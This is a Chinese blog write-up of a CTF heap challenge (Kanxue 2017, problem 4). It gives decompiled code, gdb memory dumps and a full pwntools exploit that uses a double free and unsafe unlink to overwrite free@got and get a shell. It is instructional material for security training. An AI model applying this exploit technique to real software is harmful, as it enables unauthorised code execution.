由看雪.Wifi万能钥匙 CTF 2017 第4题分析linux double free及unlinking漏洞

最新推荐文章于 2022-03-05 15:30:35 发布
最新推荐文章于 2022-03-05 15:30:35 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 系统调试 文章标签: unlinking double fre
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35519254/article/details/77772707
版权
相关程序可以在这里下载: http://ctf.pediy.com/game-fight-34.htm
我是在ubuntu16 64位调试的

先说下知识点吧,简单的请参考我的上一篇文章: http://blog.csdn.net/qq_35519254/article/details/77532248
现在unlink函数加了个判断需要绕过:

即必须保证 FD->bk = P 并且 BK->fd = P`
为了绕过这个验证,需要找到一个地址x,使*x=p,
释放chunk前,检查 FD->bk=BK->fd=P , P为当前需要free的chunk指针,BK的前一个chunk的指针,FD为后一个chunk的指针。如果有一个堆指针可控,并在一个chunk的数据段内,再如果有个可控的地址是指向P的,记为* X=P。那么我们就在此chunk上构造两个chunk,第一个chunk在 pre_size 的标志位P设为1,大小到P结束,第二个chunk的 pre_size 的标志位P设为0,针对64位系统,第一个chunk的fd设为(X-0x18),bk设为(X-0x10),即P->fd=(X-0x18),P->bk=(X-0x10),又因为* X=P,所以(X-0x18)->bk=P,(X-0x10)->fd=P,通过unlink的检查,按照unlink的宏代码,unlink过程中X的内容前后被写为 (X-0x10)、(X-0x18) ,最终X的内容被我们改写。

记住以上知识点。


先分析一下create、edit、delete这三个函数。

利用IDA分析一下create函数 
int create()
{
  int result; // eax@1
  char buf; // [sp+0h] [bp-90h]@5
  void *dest; // [sp+80h] [bp-10h]@4
  int index; // [sp+88h] [bp-8h]@3
  size_t nbytes; // [sp+8Ch] [bp-4h]@2

  result = dword_6020AC;
  if ( dword_6020AC <= 4 )
  {
    puts("Input size");
    result = read_int();
    LODWORD(nbytes) = result;
    if ( result <= 4096 )
    {
      puts("Input cun");
      result = read_int();
      index = result;
      if ( result <= 4 )
      {
        dest = malloc((signed int)nbytes);
        puts("Input content");
        if ( (signed int)nbytes > 112 )
        {
          read(0, dest, (unsigned int)nbytes);
        }
        else
        {
          read(0, &buf, (unsigned int)nbytes);
          memcpy(dest, &buf, (signed int)nbytes);
        }
        *(_DWORD *)(qword_6020C0 + 4LL * index) = nbytes;
        *((_QWORD *)&unk_6020E0 + 2 * index) = dest;
        dword_6020E8[4 * index] = 1;
        ++dword_6020AC;
        result = fflush(stdout);
      }
    }
  }
  return result;
}

可以看到当创建heap的时候,会将malloc的返回值保存到0x6020e0为起始地址的位置,如果分配了就将1写入到6020E8位起始地址的位置(也就是flag值),如下所示: 
gdb-peda$ x/50gx 0x6020c0 
0x6020c0:	0x0000000001e8c010	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000001e8c060	0x0000000000000001
0x6020f0:       0x0000000001e8c1a0	0x0000000000000001
0x602100:	0x0000000001e8c090	0x0000000000000000
0x602110:	0x0000000000000000	0x0000000000000000

堆的大小保存在以0x1e8c010为起始地址处。 
gdb-peda$ x/wx 0x6020c0 
0x6020c0:	0x01e8c010
gdb-peda$ x/wx 0x1e8c010 
0x1e8c010:	0x00000020
gdb-peda$ x/10wx 0x1e8c010 
0x1e8c010:	0x00000020	0x00000100	0x00000100	0x00000000
0x1e8c020:	0x00000000	0x00000000	0x00000031	0x00000000
0x1e8c030:	0x69646570	0x00000079

__int64 delete()
{
  __int64 result; // rax@1
  int v1; // [sp+Ch] [bp-4h]@1

  puts("Chose one to dele");
  result = read_int();
  v1 = result;
  if ( (signed int)result <= 4 )
  {
    free(*((void **)&unk_6020E0 + 2 * (signed int)result));
    dword_6020E8[4 * v1] = 0;
    puts("dele success!");
    result = (unsigned int)(dword_6020AC-- - 1);
  }
  return result;
}


在进行删除操作时,直接从0x6020e0+index*0x10处获取堆指针,然后使用free函数删除堆,然后将0x6020e8+index*0x10处设置为0(将flag置1). 

int edit()
{
  int result; // eax@1
  int index; // [sp+Ch] [bp-4h]@1

  puts("Chose one to edit");
  result = read_int();
  index = result;
  if ( result <= 4 )
  {
    result = dword_6020E8[4 * result];
    if ( result == 1 )
    {
      puts("Input the content");
      read(0, *((void **)&unk_6020E0 + 2 * index), *(_DWORD *)(4LL * index + qword_6020C0));
      result = puts("Edit success!");
    }
  }
  return result;
}


在进行edit操作时,首先根据index从0x6020e8+0x10*index处获取以前保存的flag值,如果flag=0说明已经free了,如果flag=1说明已经分配,可以编辑,然后获取0x6020e0+index*0x10处的指针,然后将用户输入的数据写入该指针对应的地址处。大小符合poi(0x6020c0)+index*0x10处保存的大小。

这三个函数已经分析完了



我先把exp贴出来一点点分析: 
#!/usr/bin/env python
from pwn import *
import sys
             
context.arch = 'amd64'
if len(sys.argv) < 2:
    p = process('./4-ReeHY-main')
    #context.log_level = 'debug'   
else:   
    p = remote(sys.argv[1], int(sys.argv[2]))#gdb.attach(p,'b *0x400cf5 \nb *0x400b62')

def welcome():
    p.recvuntil('name: \n$')
    p.send('pediy')

def create(index,size,content):
    p.recvuntil('*********\n$')
    p.send('1')
    p.recvuntil('Input size\n')
    p.send(str(size))
    p.recvuntil('Input cun\n')
    p.send(str(index))
    p.recvuntil('Input content\n')
    p.send(content) 
   
def delete(index):
    p.recvuntil('*********\n$')
    p.send('2')
    p.recvuntil('Chose one to dele\n')
    p.send(str(index))

def edit(index,content):
    p.recvuntil('*********\n$')
    p.send('3')
    p.recvuntil('to edit\n')
    p.send(str(index))
    p.recvuntil('the content\n')
    p.send(content)

def exp():    
    #system_off = 0x46590
    #puts_off = 0x6fd60
    #binsh_off = 0x180103
    #pop_ret_addr = 0x400DA3
    
    #system_off = 0x41fd0
    #puts_off = 0x6cee0
    system_off = 0x45390
    puts_off = 0x6f690
    got_addr = 0x602018    #free@got
    p_addr = 0x602100
    puts_plt = 0x4006d0 
     
    welcome()
    create(0,0x20,'/bin/sh\x00')
 
    log.info('gen point to control...')
    pause()
    create(2,0x100,'BBBB')
    create(1,0x100,'CCCC')
    delete(2)
    delete(1)
    payload = p64(0)+p64(0x101)+p64(p_addr-0x18)+p64(p_addr-0x10)+'A'*(0x100-32)+p64(0x100)+p64(0x210-0x100)
    create(2,0x210,payload)
    delete(1)
     
    log.info('leaking address...')
    edit(2,p64(1)+p64(got_addr)+p64(1)+p64(got_addr+8)+p64(1))
    edit(1,p64(puts_plt))
    delete(2)
    puts_addr = p.recv(6)
    log.info('puts address:'+hex(u64(puts_addr+'\x00'*2)))
 
    system_addr = u64(puts_addr+'\x00'*2)-puts_off+system_off
    log.info('system address:'+hex(system_addr))
 
    log.info('get shell!!!')
    edit(1,p64(system_addr))
    delete(0)   
    p.interactive()
if __name__ == '__main__':
    exp()

我们的目的就是改写got段,比如将free@got的地址改写为system@got或者put@got这样,当调用free函数的时候,就可以执行system函数或者put函数了。

怎么改写got段呢 ,在unlink的时候,有一处覆写可以利用,然后在地址0x6020e0开始处保存了堆的指针,如果该出可以被改写,那便在以后edit函数调用了,就可以改写指针对应地址的数据了。


下边详细分析一下吧。 
create(0,0x20,'/bin/sh\x00')
    create(2,0x100,'BBBB')
    create(1,0x100,'CCCC')


创建三个堆,index分别为0,2,1,大小分别是0x20,0x100,0x100,此时内存布局是这样的: 
gdb-peda$ x/10gx 0x6020e0
0x6020e0:	0x0000000001e8c060	0x0000000000000001
0x6020f0:	0x0000000001e8c1a0	0x0000000000000001
0x602100:	0x0000000001e8c090	0x0000000000000001

gdb-peda$ x/100gx 0x1e8c060
0x1e8c060:	0x0068732f6e69622f	0x00007ffea2378a50
0x1e8c070:	0x000000000000000a	0xffffffffffffffff
0x1e8c080:	0x0000000000000000	0x0000000000000111
0x1e8c090:	0x0000000042424242	0x0000000000000000
0x1e8c0a0:	0x0000000000000000	0x0000000000000000
0x1e8c0b0:	0x0000000000000000	0x0000000000000000
0x1e8c0c0:	0x0000000000000000	0x0000000000000000
0x1e8c0d0:	0x0000000000000000	0x0000000000000000
0x1e8c0e0:	0x0000000000000000	0x0000000000000000
0x1e8c0f0:	0x0000000000000000	0x0000000000000000
0x1e8c100:	0x0000000000000000	0x0000000000000000
0x1e8c110:	0x0000000000000000	0x0000000000000000
0x1e8c120:	0x0000000000000000	0x0000000000000000
0x1e8c130:	0x0000000000000000	0x0000000000000000
0x1e8c140:	0x0000000000000000	0x0000000000000000
0x1e8c150:	0x0000000000000000	0x0000000000000000
0x1e8c160:	0x0000000000000000	0x0000000000000000
0x1e8c170:	0x0000000000000000	0x0000000000000000
0x1e8c180:	0x0000000000000000	0x0000000000000000
0x1e8c190:	0x0000000000000000	0x0000000000000111
0x1e8c1a0:	0x0000000043434343	0x0000000000000000
0x1e8c1b0:	0x0000000000000000	0x0000000000000000
0x1e8c1c0:	0x0000000000000000	0x0000000000000000
0x1e8c1d0:	0x0000000000000000	0x0000000000000000
0x1e8c1e0:	0x0000000000000000	0x0000000000000000
0x1e8c1f0:	0x0000000000000000	0x0000000000000000
0x1e8c200:	0x0000000000000000	0x0000000000000000
0x1e8c210:	0x0000000000000000	0x0000000000000000
0x1e8c220:	0x0000000000000000	0x0000000000000000




然后是:
delete(2)
delete(1)
将这两个堆释放掉,内存布局是这样的: 
gdb-peda$ x/10gx 0x1e8c010
0x1e8c010:	0x0000010000000020	0x0000000000000100
0x1e8c020:	0x0000000000000000	0x0000000000000031
0x1e8c030:	0x0000007969646570	0x0000000000000000
0x1e8c040:	0x0000000000000000	0x0000000000000000
0x1e8c050:	0x0000000000000000	0x0000000000000031
gdb-peda$ x/10gx 0x6020e0
0x6020e0:	0x0000000001e8c060	0x0000000000000001
0x6020f0:	0x0000000001e8c1a0	0x0000000000000000
0x602100:	0x0000000001e8c090	0x0000000000000000
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000

gdb-peda$ x/100gx 0x1e8c060
0x1e8c060:	0x0068732f6e69622f	0x00007ffea2378a50
0x1e8c070:	0x000000000000000a	0xffffffffffffffff
0x1e8c080:	0x0000000000000000	0x0000000000020f81
0x1e8c090:	0x00007ff81a1cab78	0x00007ff81a1cab78
0x1e8c0a0:	0x0000000000000000	0x0000000000000000
0x1e8c0b0:	0x0000000000000000	0x0000000000000000
0x1e8c0c0:	0x0000000000000000	0x0000000000000000
0x1e8c0d0:	0x0000000000000000	0x0000000000000000
0x1e8c0e0:	0x0000000000000000	0x0000000000000000
0x1e8c0f0:	0x0000000000000000	0x0000000000000000
0x1e8c100:	0x0000000000000000	0x0000000000000000
0x1e8c110:	0x0000000000000000	0x0000000000000000
0x1e8c120:	0x0000000000000000	0x0000000000000000
0x1e8c130:	0x0000000000000000	0x0000000000000000
0x1e8c140:	0x0000000000000000	0x0000000000000000
0x1e8c150:	0x0000000000000000	0x0000000000000000
0x1e8c160:	0x0000000000000000	0x0000000000000000
0x1e8c170:	0x0000000000000000	0x0000000000000000
0x1e8c180:	0x0000000000000000	0x0000000000000000
0x1e8c190:	0x0000000000000110	0x0000000000000110
0x1e8c1a0:	0x0000000043434343	0x0000000000000000
0x1e8c1b0:	0x0000000000000000	0x0000000000000000



然后再创建一个index为2的堆,大小为0x210,并写入一下数据: 
payload = p64(0)+p64(0x101)+p64(p_addr-0x18)+p64(p_addr-0x10)+'A'*(0x100-32)+p64(0x100)+p64(0x210-0x100)
    create(2,0x210,payload)




gdb-peda$ x/10gx 0x6020e0
0x6020e0:	0x0000000001e8c060	0x0000000000000001
0x6020f0:	0x0000000001e8c1a0	0x0000000000000000
0x602100:	0x0000000001e8c090	0x0000000000000001
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
gdb-peda$ x/10gx 0x1e8c010
0x1e8c010:	0x0000010000000020	0x0000000000000210
0x1e8c020:	0x0000000000000000	0x0000000000000031
0x1e8c030:	0x0000007969646570	0x0000000000000000
0x1e8c040:	0x0000000000000000	0x0000000000000000
0x1e8c050:	0x0000000000000000	0x0000000000000031
gdb-peda$ x/50gx 0x1e8c060
0x1e8c060:	0x0068732f6e69622f	0x00007ffea2378a50
0x1e8c070:	0x000000000000000a	0xffffffffffffffff
0x1e8c080:	0x0000000000000000	0x0000000000000221
0x1e8c090:	0x0000000000000000	0x0000000000000101
0x1e8c0a0:	0x00000000006020e8	0x00000000006020f0
0x1e8c0b0:	0x4141414141414141	0x4141414141414141
0x1e8c0c0:	0x4141414141414141	0x4141414141414141
0x1e8c0d0:	0x4141414141414141	0x4141414141414141
0x1e8c0e0:	0x4141414141414141	0x4141414141414141
0x1e8c0f0:	0x4141414141414141	0x4141414141414141
0x1e8c100:	0x4141414141414141	0x4141414141414141
0x1e8c110:	0x4141414141414141	0x4141414141414141
0x1e8c120:	0x4141414141414141	0x4141414141414141
0x1e8c130:	0x4141414141414141	0x4141414141414141
0x1e8c140:	0x4141414141414141	0x4141414141414141
0x1e8c150:	0x4141414141414141	0x4141414141414141
0x1e8c160:	0x4141414141414141	0x4141414141414141
0x1e8c170:	0x4141414141414141	0x4141414141414141
0x1e8c180:	0x4141414141414141	0x4141414141414141
0x1e8c190:	0x0000000000000100	0x0000000000000110
0x1e8c1a0:	0x0000000043434343	0x0000000000000000
0x1e8c1b0:	0x0000000000000000	0x0000000000000000
0x1e8c1c0:	0x0000000000000000	0x0000000000000000
0x1e8c1d0:	0x0000000000000000	0x0000000000000000


可见此处创建的index为2的堆正好将之前创建的index为1,2的堆覆盖掉,因为0x100+0x10(第二个堆的堆首)+0x100=0x210,
此处创建的堆地址保存在地址0x602100处。

delete(1)
这条就非常重要了,会发生许多莫名奇妙的事了,因为前边已经delete(1)过了,这样就会造成double free,通过前边的create已经将index为1的堆的堆首改为 0x0000000000000100 0x0000000000000110。
这样当free index为1的堆时,就会通过该堆的prev_inuse判断前一个堆是否处于allocate状态,很明显,prev_index=0,所以就会认为index=2的堆处于free状态,这样就会发生unlink操作,具体就是将index=2的堆的bk+0x10处的数据改写为fd,也就是将 0x00000000006020f0+0x10=0x0000000000602100处的数据改写为0x00000000006020e8
而0x0000000000602100处正好保存的是index=2的堆的指针

这样当下次编辑index=2的堆时,其实就是编辑地址0x00000000006020e8的数据了,而该地址的附近正好保存着index=1的指针,如果将index=1的指针修改为free@got的地址,那再编辑index=1的堆时,就可以将free的地址修改为其他地址,比如system或者put等
这样当再次调用free函数时,其实就是执行system函数或者put函数了。

delete(1)后: 
gdb-peda$ x/10gx 0x6020e0
0x6020e0:	0x0000000001e8c060	0x0000000000000001
0x6020f0:	0x0000000001e8c1a0	0x0000000000000000
0x602100:	0x00000000006020e8	0x0000000000000001
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000

可以看到成功将index=2的指针修改为了0x00000000006020e8


edit(2,p64(1)+p64(got_addr)+p64(1)+p64(got_addr+8)+p64(1))
其实就是修改0x6020e8处的数据。
got_addr对应的是free@got,这样就将index=1的堆指针修改为了free@got的地址
got_addr+8对应的是puts@got

edit(1,p64(puts_plt))
将free@got地址修改为puts_plt的地址。
delete(2),本来是调用free(),现在变成了调用puts(puts@got)这样就得到了puts函数的内存低址。
通过偏移就计算出system的函数地址了:
system_addr = u64(puts_addr+'\x00'*2)-puts_off+system_off
log.info('system address:'+hex(system_addr))


edit(1,p64(system_addr))
将free@got替换为system函数地址。
delete(0)
在调用free的时候相当于调用了system函数,而且index=0的堆正好保存了/bin/sh字符串,所以获得了一个shell。


参考:
qq_35519254
关注
专栏目录
一道堆方向的pwn(double free & unsorted bins)
F_Day_的博客
10-17 1033
一道堆方向的pwn(double free & unsorted bins)做环境什么是double free 在某博客上看到了一道堆的,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 目:Roc826 什么是double free 希望再次之前,你已经知道什么是堆了。 double free就是对一个堆free两次 在堆中,free后堆
Double Free浅析
热门推荐
这里没人
05-14 1万+
最近在研究一些堆上面的漏洞。然后某一天骑自行车在路上跑的时候我突然悟出了Double Free的真谛。 2333好像太中二了一点,我是根据堆溢出的利用方法启发,再结合linux中libc的源码。研究出了double free的利用方法。虽然有关double free的利用技巧已经不是一个秘密。不过好像很少有相关的中文的介绍,所以以一个初学者的角度来讲解一下double free漏洞的利用方法。 ...
综合交易平台CTP Linux Double Free解决方案
03-16
CTP开发中,如果把Trade,Market的so放在一起开发,如果不做处理,会遇到double free or corruption(!prev)的错误,基本如下: *** glibc detected *** ./bin/quant_ctp_XTrader_no_debug_2017-03-16_15-36-20: double free or corruption (!prev): 0x0000000001d71120 *** ======= Backtrace: ========= /lib64/libc.so.6[0x32b4a75f3e] /lib64/libc.so.6[0x32b4a78dd0] /usr/lib64/libthosttraderapi.so(+0x184612)[0x7f3d1e503612] /lib64/libc.so.6(__cxa_finalize+0x9d)[0x32b4a35e7d] /usr/lib64/libthosttraderapi.so(+0x104b46)[0x7f3d1e483b46] 开发中我也遇到该问,后辛苦找到解决办法。方案附送在该附件里,仅供参考。 仅供参考!仅供参考!仅供参考! 重要的事情说三遍! 使用此代码引起的任何损失,笔者不承担任何责任。
pwn学习(二)
qq_37439229的博客
10-02 873
今天主要刷了点,学到个格式化字符串泄漏cancary fm from pwn import * #p = process('./main') p = remote('node3.buuoj.cn',28633) payload = '%4c%13$n' + p32(0x804a02c) p.send(payload) #print(p.recv()) p.interactive() 格式化字符串覆盖小数字 jarvisoj_tell_me_something from pwn import * p =
Double free(hows2heap)
fanghuapyk的博客
04-23 1757
1.fastbin_dup fast bin fast bin主要是用来存放一些小的内存,使用fastbin可以提高小内存的分配效率,在默认情况下,对于SIZE_SZ为4B(32位)的平台,小于64B(字节)的chunk分配请求,和对于SIZE_SZ为8B(64位)的平台,小于128B的chunk分配请求首先会在fast bin中查找是否有所需大小的chunk存在,如果存在,就会直接返回内存资源,如果不存在,才会到其他bins中去查找。 fastbins 可以看成一个后进先出的栈,使用单链表来实现,通过 f
看雪.Wifi万能钥匙 2017CTF年中赛---第一
I have a dream
09-29 660
考察浮点数运算 1、OD载入,搜索字符串,查找到错误或正确提示信息,双击点进去。 找到以为的关键跳转,下断点,重新载入,输入注册码,运行,竟然提示错误! 不死心的将关键跳转NOP掉,保存到文件,运行, 结果依然报错!果然爆破不行呀……那就老老实实查看算法吧。 2、在该段开始位置下断点,OD重新载入,运行,输入key,断在段首,仔细分析汇编代码 发现程序,首先判断输入长度是否等于4,如果不...
看雪wifi万能钥匙CTF年中赛 第四 writeup
ACdream
11-26 1403
这个和这次秋季赛的第四很类似,都是利用的堆的unlink来溢出,然后system(“/bin/sh”)来提权的 所以打算先学习这个,然后再去自己做秋季赛第四 官方writeup和目下载链接 主要是看了这篇writeup:double free解法 double free,就是free两次(废话) 先来分析程序流程,再来说double free是个什么原
看雪wifi万能钥匙CTF年中赛 第四 writeup(2)
ACdream
01-04 636
看雪CTF
看雪CTF2017第一简单分析
Youngs-RSR技术专栏
06-01 2303
比较简单,无壳、无VM、无密码学,适合入门练习 中午一觉睡醒,逛逛论坛才发现有ctf比赛,就随便看了一下 动态调一下就好了,发现确实是多解,下面我就简单说一下自己的分析流程吧 0x00 定位关键跳转 首先拿到CrackMe,就直接随便输入了一串字符串“111111” 看到是有弹窗提示的,根据报出的“error !”字符串就能直接定位到关键跳转位置了。 下面就通过字符串
看雪ctf2017第一详解
zsd747289639的博客
06-10 1828
第一步、先瞅瞅 随便输入点啥,发现如下报错 第二步、Od加载程序,下断点 一般这种程序,第一感觉就是在下api断点,右键->查找->当前模块中的名称 找到getDlgItemTextA 右键->在输入函数上切换断点  设置断点 F9运行程序,程序断在了此处 第三步,算法分析 一路f8执行到retn返回,来到 这里我们看到它调用了一个wann
use after free & double free利用
笔记本
02-24 399
在fastbin下的use after free & double free利用 double free + fastbin attack = 任意地址写 在malloc()时,当用户所要求内存大小在 fastbin 的大小范围时,malloc()优先从fastbin中拿出chunk 规则:释放堆插入到head后的第一个chunk;分配堆释放head后的第一个chunk 初始状态 [head]—>[chunk1:next,…]—>[chunk2:null] 此时申请了两个堆: [hea
Double Free浅析(泄露堆地址的一种方法)
omnispace的博客
04-18 7345
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞double free的原理其实和堆溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像和普通的堆溢出伪造chunk然后free触发unlink...
Double free 漏洞复现与利用
vivid_moon的博客
05-29 5729
2018体系结构安全大作业申明:转载请注明出处选:2015 年 0ctf 目描述:提供记事本功能的二进制文件,找出其漏洞,get shell第一章 操作说明为方便老师审核作业,本报告将操作说明放在第一章。操作流程如下:1 、安装 netcat 。2 、安装 pwntools 库。命令: pip install pwntools (安装过程中,一定要保证网络畅通,曾经因为网不好装这个库装了一个...
linux_pwn(2)--double free&&qwb2018_raisepig
azraelxuemo的博客
03-05 1438
文章目录What is double freepwnadd函数show函数delete函数开始做准备框架调试泄露libcdouble freeexp总结 What is double free double free顾名思义,两次释放,在ctf里面一般就是对同一个内存块释放了两次,其实这个跟之前的uaf产生的方式有点类似,都是需要满足指针没有被置NULL ptr=malloc(0x10) ptr2=malloc(0x10) free(ptr) free(ptr2) free(ptr) 由于直接连续
double free
猪猪乐园
08-18 1万+
*** glibc detected *** free(): invalid pointer:*** glibc detected *** malloc(): memory corruption:*** glibc detected *** double free or corruption (out): 0x00000000005c18a0 ****** glibc detected *** c
动态共享库引发的double free错误的分析
werflychen的专栏
07-02 2921
背景项目中遇到了这么个场景:项目中,所有文件可以生成一个动态链接库A.so场景1:A.so 假设由N个.o生成,不妨假设由a.o,b.o生成。如果将main.cpp -&gt; main.omain.o, a.o, b.o  -&gt; main_bin,运行./main_bin,运行正常。 场景2:将A.so、main.cpp,两个一起生成一个可执行程序即是main.cpp -&gt; ma...
图解double free 原理
yy2014yy的博客
03-22 2955
理解double free
Linux堆利用】Fastbin Double Free
、moddemod
06-16 494
Double Free是针对fastbin的攻击,字面意思就是重复释放内存,也就是两次free()同一块内存导致的漏洞。 由于fastbin的机制,在满足fastbin的chunk在被释放后它下一个chunk的P位不会被置为0,也就是说即使当前chunk被释放掉了,但是他的next_chunk的P为还依然为1(1表示前一个chunk正在使用中),但他却是已经被free()掉了,这样做的目的是为了防止chunk被合并(因为现实证明,就是程序通常会申请小内存块比较频繁,如果每次申请释放都重复分割合并,会导致性能
使用WinDbg —— .NET篇 (四)
ecjtu_luowei的专栏
09-27 1949
六、 内存相关 内存管理一直都是很大的话,内存问也是程序中最常见的问。一般常见的内存问有:悬挂指针(Dangling Pointer)、重复释放(Double Free)、内存泄露(Memory Leak)。悬挂指针是指某个变量指针指向的地址内存已经被释放掉了,这个指针地址已经无效,这种错误在托管代码中已经不存在了,所以这个不讲。跟悬挂指针关系比较密切的错误是Heap Corrup
深入分析领航杯CTF 2021决赛真压缩包
资源摘要信息:"领航杯CTF 2021 决赛是针对信息安全领域竞赛的一次重要活动,其内容涉及广泛的IT技术领域,包括但不限于加密解密、网络攻防、漏洞挖掘、逆向工程等。CTF(Capture The Flag)意为夺旗赛,是一种网络...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值